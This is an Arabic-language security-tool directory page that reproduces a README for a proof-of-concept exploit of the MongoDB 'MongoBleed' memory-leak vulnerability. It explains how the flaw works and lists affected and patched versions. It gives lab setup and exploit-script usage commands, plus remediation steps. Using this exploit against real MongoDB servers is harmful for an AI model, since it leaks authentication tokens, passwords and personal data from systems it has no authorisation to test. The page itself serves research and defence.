Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-14847-MongoBleed-Exploit — CVE-2025-14847 MongoBleed - ثغرة تسرّب الذاكرة في MongoDB PoC | Kitploit
أدوات/GitHubGitHub/furkankayapinar/cve-2025-14847-mongobleed-exploit
تحليل الذاكرة الجنائيتحليل الثغرات الأمنيةالاستغلالالتعلم والتعليمأمن قواعد البياناتمختبرات وتدريب عملي
GitHubfurkankayapinar/cve-2025-14847-mongobleed-exploit

CVE-2025-14847-MongoBleed-Exploit

CVE-2025-14847 MongoBleed - ثغرة تسرّب الذاكرة في MongoDB PoC

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
1منذ 7 أشهرلم تتم المراجعة بعد

CVE-2025-14847 - MongoBleed

Python License CVE

👨‍💻 المؤلف: Furkan KAYAPINAR (@FurkanKAYAPINAR)

⚠️ للأغراض التعليمية فقط

بيئة مختبر وسكربت استغلال لثغرة تسريب الذاكرة الحرجة التي لا تتطلب مصادقة في خادم MongoDB.


📋 جدول المحتويات

  • نظرة عامة على الثغرة

  • الإصدارات المتأثرة

  • التثبيت

  • بيئة المختبر

  • الاستخدام

  • المعالجة

  • إخلاء المسؤولية القانوني


🔴 نظرة عامة على الثغرة

CVE-2025-14847 (MongoBleed) هي ثغرة حرجة لتسريب الذاكرة لا تتطلب مصادقة في معالجة ضغط zlib داخل خادم MongoDB.

التفاصيل التقنية

توجد الثغرة في message_compressor_zlib.cpp. عند معالجة رسائل OP_COMPRESSED:

  1. يرسل المهاجم رسالة مصمّمة بحقول طول غير متناسقة
  2. يخصص الخادم مخزنًا مؤقتًا بناءً على الحجم المُعلَن uncompressedSize
  3. البيانات المفكوك ضغطها فعليًا أصغر من الحجم المُعلَن
  4. يعيد الخادم طول المخزن المؤقت المخصص بدلاً من طول البيانات الفعلي
  5. يتم تسريب ذاكرة كومة غير مهيأة إلى المهاجم

التأثير

قد تتضمن البيانات المسربة:

  • 🔑 رموز المصادقة والأسرار
  • 🗄️ بيانات جلسات قاعدة البيانات
  • 👤 المعلومات الشخصية القابلة للتعريف (PII)
  • 🔐 مفاتيح API وكلمات المرور
  • ⚙️ تفاصيل الإعدادات

📦 الإصدارات المتأثرة


🚀 التثبيت

root@kitploit:~
# Clone repository
git clone https://github.com/FurkanKAYAPINAR/CVE-2025-14847-MongoDB.git
cd CVE-2025-14847-MongoDB

# Create virtual environment
python3 -m venv venv
source venv/bin/activate  # Linux/macOS
# venv\Scripts\activate   # Windows

# Install dependencies
pip install -r requirements.txt

🧪 بيئة المختبر

شغّل نسخة MongoDB قابلة للاستغلال للاختبار:

root@kitploit:~
cd lab

# Start vulnerable MongoDB (6.0.26 with zlib enabled)
docker-compose up -d

# Verify it's running
docker-compose ps

# Load sample data (optional)
./setup.sh load-data

# Stop lab
docker-compose down

💀 الاستخدام

الاستغلال الأساسي

root@kitploit:~
# Single target
python exploit/mongobleed.py -u 127.0.0.1

# With specific port
python exploit/mongobleed.py -u 127.0.0.1 -p 27017

# Save leaked data to file
python exploit/mongobleed.py -u 127.0.0.1 -o leaked_data.bin

# Multiple iterations for more data
python exploit/mongobleed.py -u 127.0.0.1 -i 20

# Quiet mode (less output)
python exploit/mongobleed.py -u 127.0.0.1 -q

# Without hex dump (text output)
python exploit/mongobleed.py -u 127.0.0.1 --text

🔧 المعالجة

الخيار 1: الترقية (موصى به)

root@kitploit:~
# Update to patched version
# Example for MongoDB 6.x
sudo apt-get update
sudo apt-get install mongodb-org=6.0.27

الخيار 2: تعطيل ضغط zlib

root@kitploit:~
# Start mongod without zlib
mongod --networkMessageCompressors snappy,zstd

# Or in mongod.conf
net:
  compression:
    compressors: snappy,zstd

التحقق من الإصلاح

root@kitploit:~
python remediation/verify_fix.py --target 127.0.0.1 --port 27017

⚖️ إخلاء المسؤولية القانوني

🚨 تحذير

تُوفَّر هذه الأداة لأغراض التعليم واختبارات الأمان المصرّح بها فقط.

  • الوصول غير المصرح به إلى أنظمة الحاسوب غير قانوني
  • أنت وحدك المسؤول عن أفعالك
  • لا يتحمل المؤلفون أي مسؤولية عن سوء الاستخدام

باستخدامك لهذه الأداة، فأنت تقرّ بأن لديك التفويض المناسب لاختبار الأنظمة المستهدفة.


📚 المراجع

  • NVD - CVE-2025-14847
  • نشرة أمان MongoDB
  • Varonis - تحليل MongoBleed

🤝 المساهمة

المساهمات مرحّب بها! يُرجى قراءة CONTRIBUTING.md أولاً.


📄 الترخيص

هذا المشروع مرخّص بموجب رخصة MIT - راجع ملف LICENSE.

تنزيل الأداة
السمةالقيمة
معرّف CVECVE-2025-14847
درجة CVSS8.7 (عالية)
متجه الهجومالشبكة
المصادقةغير مطلوبة
تاريخ الإفصاح19 ديسمبر 2025
نطاق الإصدارالإصدار المُصحَّح
8.2.0 - 8.2.28.2.3
8.0.0 - 8.0.168.0.17
7.0.0 - 7.0.267.0.28
6.0.0 - 6.0.266.0.27
5.0.0 - 5.0.315.0.32
4.4.0 - 4.4.294.4.30
جميع إصدارات 4.2 و4.0 و3.6EOL - قم بالترقية فورًا